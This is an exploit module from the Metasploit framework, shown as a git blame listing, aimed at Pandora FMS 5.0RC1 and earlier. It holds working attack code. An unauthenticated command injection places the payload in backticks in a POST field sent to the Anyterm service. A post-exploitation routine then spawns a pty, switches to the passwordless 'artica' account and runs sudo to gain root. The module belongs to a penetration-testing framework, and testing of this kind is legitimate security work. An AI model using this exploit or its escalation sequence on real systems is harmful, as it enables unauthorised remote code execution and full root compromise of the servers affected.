metasploit-framework/modules/exploits/linux/http/pandora_fms_exec.rb

114 lines
3.4 KiB
Ruby
Raw Normal View History

2014-01-29 05:46:23 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
2014-01-29 05:46:23 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "Pandora FMS Remote Code Execution",
'Description' => %q{
This module exploits a vulnerability found in Pandora FMS 5.0RC1 and lower.
It will leverage an unauthenticated command injection in the Anyterm service on
port 8023/TCP. Commands are executed as the user "pandora". In Pandora FMS 4.1 and 5.0RC1
2014-01-29 05:46:23 +00:00
the user "artica" is not assigned a password by default, which makes it possible to su
to this user from the "pandora" user. The "artica" user has access to sudo without a
password, which makes it possible to escalate privileges to root. However, Pandora FMS 4.0
and lower force a password for the "artica" user during installation.
},
'License' => MSF_LICENSE,
'Author' =>
[
'xistence <xistence[at]0x90.nl>' # Vulnerability discovery and Metasploit module
],
'References' =>
[
],
'Payload' =>
{
'BadChars' => "",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl python',
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['Pandora 5.0RC1', {}]
],
'Privileged' => true,
'DisclosureDate' => "Jan 29 2014",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8023),
OptString.new('TARGETURI', [true, 'The base path to the Pandora instance', '/']),
], self.class)
end
def on_new_session(client)
print_status("#{peer} - Trying to escalate privileges to root")
2014-02-06 21:21:54 +00:00
[
# ignore SIGHUP so the server doesn't kill our root shell
"trap '' HUP",
# Spawn a pty for su/sudo
"python -c 'import pty;pty.spawn(\"/bin/sh\")'",
# Su to the passwordless "artica" account
"su - artica",
# The "artica" use has sudo rights without the need for a
# password, thus gain root priveleges
"sudo -s",
].each do |command|
vprint_status(command)
client.shell_write(command + "\n")
end
2014-01-29 05:46:23 +00:00
2014-02-06 21:21:54 +00:00
super
2014-01-29 05:46:23 +00:00
end
def check
# Check version
print_status("#{peer} - Trying to detect Pandora FMS Remote Gateway")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "anyterm.html")
2014-01-29 05:46:23 +00:00
})
2014-02-06 21:21:54 +00:00
if res && res.code == 200 && res.body.include?("Pandora FMS Remote Gateway")
2014-01-29 05:46:23 +00:00
print_good("#{peer} - Pandora FMS Remote Gateway Detected!")
return Exploit::CheckCode::Detected
2014-01-29 05:46:23 +00:00
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("#{peer} - Sending payload")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "/anyterm-module"),
2014-01-29 05:46:23 +00:00
'vars_post' => {
'a' => "open",
2014-02-06 21:21:54 +00:00
'p' => "`#{payload.encoded}`"
2014-01-29 05:46:23 +00:00
}
})
2014-02-06 21:21:54 +00:00
if !res || res.code != 200
2014-01-29 05:46:23 +00:00
fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
end
end
end